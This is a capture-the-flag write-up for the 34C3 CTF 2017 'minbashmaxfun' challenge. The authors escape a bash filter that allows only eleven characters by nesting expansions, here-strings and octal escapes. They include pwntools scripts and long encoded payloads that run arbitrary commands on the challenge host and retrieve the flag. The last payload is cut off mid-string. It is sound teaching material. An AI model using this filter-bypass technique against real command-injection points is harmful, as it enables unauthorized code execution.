##                       ##

########           ########

############   ############

 ###########   ########### 

   #########   #########   

"@_    #####   #####    _@"

#######             #######

############   ############

############   ############

############   ############

######    "#   #"    ######

 #####               ##### 

  #####             #####  

    ####           ####    

       '####   ####'

/

/Team

/Meetings

/Writeups

/Scores

/Sponsors

D
O
N
O
T
F
E
E
D
T
H
E
B
U
G
S

minbashmaxfun

[34C3 CTF, 2017]

category: misc

by yrlf, mickdermack, bumblefaq

  • Category: web
  • Points: 162
  • Description:

Minimal bash - maximal fun!

nc 35.198.107.77 1337

Difficulty: medium

Writeup

This was the only challenge mick, bumblefaq and I managed to solve this ctf, as we were also busy checking out this year's Chaos Communication Congress. But it was a really fun challenge and it was really cool hacking at stuff among many other techy people.

But, on to the challenge:

The Challenge

Connecting to the address given we are greeted by a nice min-bash> prompt. Trying out some commands we immediately notice that lots of characters are illegal.

The help command gives us this message:

    +=============================================================+
    |                MINIMAL BASH - MAXIMAL FUN                   | 
    |                                                             | 
    |            Who needs regular characters anyway?             |  
    |                                                             | 
    |         Supported characters: $ ( ) # ! { } < \ ' ,         |
    |                                                             |
    |         Supported binaries: i'm sure there is some          |
    |                                                             |
    |               Iz also open-source: 'source'                 |
    |                                                             |
    +=============================================================+

And the source command:

                                                                         .---. 
      Source iz sumthing like dis:                                      /  .  \ 
                                                                       |\_/|   | 
                                                                       |   |  /| 
      .----------------------------------------------------------------------' | 
     /  .-.                                                                    | 
    |  /   \                                                                   | 
    | |\_.  |     [....]                                                       | 
    |\|  | /|                                                                  | 
    | `---' |     /* these 11 chars should be more than enough  */             | 
    |       |     re = regcomp(&regex, "[^${}!#()<'\\,]", 0);                  |  
    |       |                                                                  |  
    |       |     [....]                                                       |  
    |       |                                                                  |  
    |       |     if (REG_NOMATCH == regexec(&regex, input, 0, NULL, 0))  {    |  
    |       |                                                                  |  
    |       |         [....]                                                   |  
    |       |                                                                  |  
    |       |         fclose(stdin);                                           |  
    |       |         execl("/bin/bash", "/bin/bash", "-c", input, NULL);      |  
    |       |                                                                  |  
    |       |         [....]                                                   |  
    |       |     }                                                            |  
    |       |                                                                  |  
    |       |     [....]                                                       |  
    |       |                                                                  / 
    |       |-----------------------------------------------------------------' 
    \       | 
     \     /         
      `---'

What we did next was trying to think of different bash features and variables we could use with just these characters:

We quickly found these:

  • command substitution: $(command)
  • arithmetic expansion: $((arithmetic))
  • brace expansion: text{a,b,c}
  • stdin redirection: command < file
  • stdin literal redirection: command <<< text
  • dollar-quoted string literals: $'string with \n and other \145scapes'
  • variable string length: ${#variable}
  • indirect variable expansion: ${!variable}

and these variables:

  • number of parameters to bash: $#
  • bash process id: $$

which is already something we can work with.

Baby steps -- piecing it together

After playing around with it we found out indirect variable expansion and string length even work with the 'special' variables like $# and $$. This allowed us to do ${!#}, which evaluated to ${0} (as bash doesn't have any parameters in this challenge), which is /bin/bash. Nice! So we can start a second bash, we won, right???

Sadly, no. Stdin was closed beforehand, which makes bash stop immediately.

But what we do have now is a shell we can 'pipe' commands into, that we could slowly build up, with a command like bash <<< some command, which we'll encode as ${!#} <<< encoded command.

Here, our dollar literal also comes in handy, because we can now use these escapes to build other characters. But oh no! that doesn't really work because $'...' doesn't expand variables inside the string, so we can't use $# to get a zero or other expansions for numbers. (like ${##} for one,

The solution for this we thought was "more BASHing!". Just add a layer of bash, that's never going to hurt :)

${!#}<<<${!#}\<\<\<\$\'\\${##}$#${##}\'

which is

bash <<< bash \<\<\< \$\'\\${##}$#${##}\'

and evaluates to

bash <<< $'\101'

which is

A

which yields

bash: A: command not found

Finally! We managed to create an ascii character!

So with just 0 and 1 we can't really write many characters, just tab, @, A, H, and I, not enough to do anything useful. If we had + we could use arithmetic to create bigger numbers, using $(1+1+1+1) for 4 for example.

So what do we do? -- We create a + for us.

For writing a +, we just need to know the octal value of it. A quick look at an ascii table tells us it's 53, so $'\53' would produce a plus. So the solution is easy, right? Just add another layer of "BASHing" and use \$\(\(1$'\53'1\)\), which evaluates to $((1+1)).

But how can we write 53?

When trying out variables we found that the challenge always has a very low process id (in the range of 5 to 10), and we can 'increment' this process id by just sending more commands.

min-bash> $$
/bin/bash: 9: command not found
min-bash> $$
/bin/bash: 10: command not found
min-bash> $$
/bin/bash: 11: command not found
min-bash> $$
/bin/bash: 12: command not found
min-bash> $$
/bin/bash: 13: command not found
min-bash> $$
/bin/bash: 14: command not found
min-bash> $$
/bin/bash: 15: command not found
min-bash>

With that knowledge we thought "Why don't we just use the process id?", and added yet another bash call to our list and built our bigger numbers from just ones and plusses.

A basic command like ps would now look like this:

bash<<<bash\<\<\<bash\\\<\\\<\\\<bash\\\\\\\<\\\\\\\<\\\\\\\<\\\\\\\$\\\\\\\'\\\\\\\\1\\\$\\\(\\\(1\$\'\\$$\'1\$\'\\$$\'1\$\'\\$$\'1\$\'\\$$\'1\$\'\\$$\'1\\\)\\\)0\\\\\\\\1\\\$\\\(\\\(1\$\'\\$$\'1\$\'\\$$\'1\$\'\\$$\'1$\'\\$$\'1\$\'\\$$\'1\\\)\\\)\\\$\\\(\\\(1\$\'\\$$\'1\$\'\\$$\'1\\\)\\\)\\\\\\\'

or

${!#}<<<${!#}\<\<\<${!#}\\\<\\\<\\\<${!#}\\\\\\\<\\\\\\\<\\\\\\\<\\\\\\\$\\\\\\\'\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\'

fully encoded.

This evaluates to these:

bash<<<bash\<\<\<bash\\\<\\\<\\\<\\\$\\\'\\\\1\$\(\(1$'\53'1$'\53'1$'\53'1$'\53'1$'\53'1\)\)0\\\\1\$\(\(1$'\53'1$'\53'1$'\53'1$'\53'1$'\53'1\)\)\$\(\(1$'\53'1$'\53'1\)\)\\\'
bash<<<bash\<\<\<\$\'\\1$((1+1+1+1+1+1))0\\1$((1+1+1+1+1+1))$((1+1+1))\'
bash<<<$'\160\163'
ps

Here's a short script that puts this into action and tries to execute ps:

from pwn import *
r = remote("35.198.107.77", 1337)
def nextpid():
    r.sendline(b"$$")
    r.readuntil(b"bash: ")
    pid = int(r.readuntil(b":")[:-1], 10)
    print("current pid: {}".format(pid))
    r.readline()
    return pid + 1
while nextpid() != 53:
    pass
exploit = rb"${!#}<<<${!#}\<\<\<${!#}\\\<\\\<\\\<${!#}\\\\\\\<\\\\\\\<\\\\\\\<\\\\\\\$\\\\\\\'\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$\$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\'"
print("sending exploit")
r.sendline(exploit)
r.interactive()

With this knowlege, writing a script that then sends arbitrary commands is not that hard.

from pwn import *
import sys
def send_cmd(cmd):
    r = remote("35.198.107.77", 1337)
    
    payload = build_payload(cmd)
    print("payload is: {}".format(payload.decode()))
    while nextpid(r) != 53:
        pass
    print("sending exploit")
    r.sendline(payload)
    r.interactive()
def nextpid(r):
    r.sendline(b"$$")
    r.readuntil(b"bash: ")
    pid = int(r.readuntil(b":")[:-1], 10)
    print("current pid: {}".format(pid))
    r.readline()
    return pid + 1
base_payload = rb"${!#}<<<${!#}\<\<\<${!#}\\\<\\\<\\\<${!#}\\\\\\\<\\\\\\\<\\\\\\\<\\\\\\\$\\\\\\\'"
base_payload_end = rb"\\\\\\\'"
def build_payload(string):
    bstr = string.encode()
    payload = base_payload
    for char in bstr:
        payload += encode_character(char)
    payload += base_payload_end
    return payload
def encode_character(byte):
    octals = "{:o}".format(byte)
    payload = rb"\\\\\\\\"
    for octal in octals:
        num = int(octal, 8)
        if num == 0:
            payload += rb"$#"
        elif num == 1:
            payload += rb"${##}"
        else:
            payload += rb"\\\$\\\(\\\(" 
            payload += rb"\$\'\\$$\'".join([rb"${##}" for i in range(num)])
            payload += rb"\\\)\\\)"
    return payload
while True:
    cmd = input("Shell> ")
    send_cmd(cmd)

So now that we can send arbitrary commands, what can we do? Let's do a little recon:

Reconaissance

Shell> ls /bin /usr/bin
[+] Opening connection to 35.198.107.77 on port 1337: Done
payload is: ${!#}<<<${!#}\<\<\<${!#}\\\<\\\<\\\<${!#}\\\\\\\<\\\\\\\<\\\\\\\<\\\\\\\$\\\\\\\'\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\'
current pid: 9
current pid: 10
current pid: 11
...
current pid: 50
current pid: 51
current pid: 52
sending exploit
[*] Switching to interactive mode
min-bash> /bin:
bash
cat
cp
dash
dd
dir
echo
false
grep
ln
ls
mkdir
mv
pwd
rm
rmdir
sed
sh
shell
su
touch
true
which

/usr/bin:
awk
base64
basename
clear
cmp
env
expr
find
groups
head
id
realpath
rev
seq
sort
split
sum
tail
tee
touch
uniq
wc
which
whoami
min-bash> $ 
Shell>
[+] Opening connection to 35.198.107.77 on port 1337: Done
payload is: ${!#}<<<${!#}\<\<\<${!#}\\\<\\\<\\\<${!#}\\\\\\\<\\\\\\\<\\\\\\\<\\\\\\\$\\\\\\\'\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\'
current pid: 9
current pid: 10
current pid: 11
...
current pid: 50
current pid: 51
current pid: 52
sending exploit
[*] Switching to interactive mode
min-bash> total 80
drwxr-xr-x   2 root root 4096 Dec 28 12:47 bin
drwxr-xr-x   2 root root 4096 Oct 16 07:46 boot
drwxr-xr-x   5 root root  340 Dec 30 01:46 dev
drwxr-xr-x  34 root root 4096 Dec 30 01:46 etc
-r--------   1 root root   54 Dec 15 12:35 flag
-r-sr-xr-x   1 root root 8904 Dec 27 14:40 get_flag
drwxr-xr-x   2 root root 4096 Oct 16 07:46 home
drwxr-xr-x   8 root root 4096 Nov 16 12:56 lib
drwxr-xr-x   2 root root 4096 Nov 16 12:56 lib64
drwxr-xr-x   2 root root 4096 Nov 16 12:56 media
drwxr-xr-x   2 root root 4096 Nov 16 12:56 mnt
drwxr-xr-x   2 root root 4096 Nov 16 12:56 opt
dr-xr-xr-x 138 root root    0 Dec 30 01:46 proc
drwx------   2 root root 4096 Nov 16 12:56 root
drwxr-xr-x   5 root root 4096 Nov 17 21:58 run
drwxr-xr-x   2 root root 4096 Nov 17 21:58 sbin
drwxr-xr-x   2 root root 4096 Nov 16 12:56 srv
dr-xr-xr-x  13 root root    0 Dec 27 23:44 sys
drwxrwxrwt   2 root root 4096 Dec 30 01:46 tmp
drwxr-xr-x  12 root root 4096 Nov 16 12:56 usr
drwxr-xr-x  14 root root 4096 Nov 16 12:56 var
min-bash> $
Shell>

So we don't have many commands to use, and there is a flag only readable by root, and a "get_flag" binary that probably reads it.

Let's try starting it:

(I'll snip the payloads and pid increasing now, because it takes up a lot of space)

Shell> /get_flag
Please solve this little captcha:
2629569118 + 2991019702 + 187237469 + 1974829101 + 3225776969
11008432359 != 0 :(

It asked us to solve a captcha, but it didn't get any input, so it closed itself.

The captcha is easy, just eval it in a $(( ... )) block, but writing it to /get_flags stdin is hard. Because stdin is closed and we don't have FIFOs (no mkfifo binary), we have to get the captcha back to input some other way.

In the end we used the file system for that:

Shell>eval "echo \$(($(cat /tmp/a)))"|/get_flag|(read l;read l;echo $l>/tmp/a;cat;)
34C3_HAHAHA_you_bashed_it_You_truly_are_a_god_of_BASH

The encoded final command was this:

${!#}<<<${!#}\<\<\<${!#}\\\<\\\<\\\<${!#}\\\\\\\<\\\\\\\<\\\\\\\<\\\\\\\$\\\\\\\'\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\